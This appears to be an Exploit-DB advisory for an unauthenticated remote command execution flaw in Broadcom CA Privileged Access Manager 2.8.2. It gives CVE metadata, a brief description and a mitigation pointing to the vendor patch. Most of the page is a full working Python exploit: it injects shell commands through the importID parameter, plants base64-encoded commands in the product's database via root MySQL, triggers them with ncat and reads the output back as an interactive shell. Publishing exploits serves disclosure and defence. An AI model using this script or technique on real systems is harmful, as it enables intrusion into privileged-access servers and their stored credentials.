Vendor: CA Privileged Access Manager
By: Peter Lapp
CVSS: 8.8 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: CA Privileged Access Manager
Affected Version From: 2.8.2
Affected Version To: 2.8.2
Patch Exists: YES
Related CVE: CVE-2018-9021 and CVE-2018-9022
CPE: a:broadcom:ca_privileged_access_manager:2.8.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: v2.8.2
2019

Broadcom CA Privileged Access Manager 2.8.2 – Remote Command Execution

A vulnerability in Broadcom CA Privileged Access Manager (PAM) 2.8.2 allows an unauthenticated attacker to execute arbitrary commands on the underlying operating system. The cause is insufficient input validation of user-supplied data: a single crafted HTTP request to the vulnerable application is enough to trigger it, and no credentials are required.

Mitigation:

Apply the vendor fix: upgrade Broadcom CA Privileged Access Manager (PAM) from 2.8.2 to a patched release, as described in CA security notice CA20180614-01 (linked in the exploit header below).

Exploit-DB raw data:

# Title: Broadcom CA Privileged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)


if __name__ == "__main__":
    main()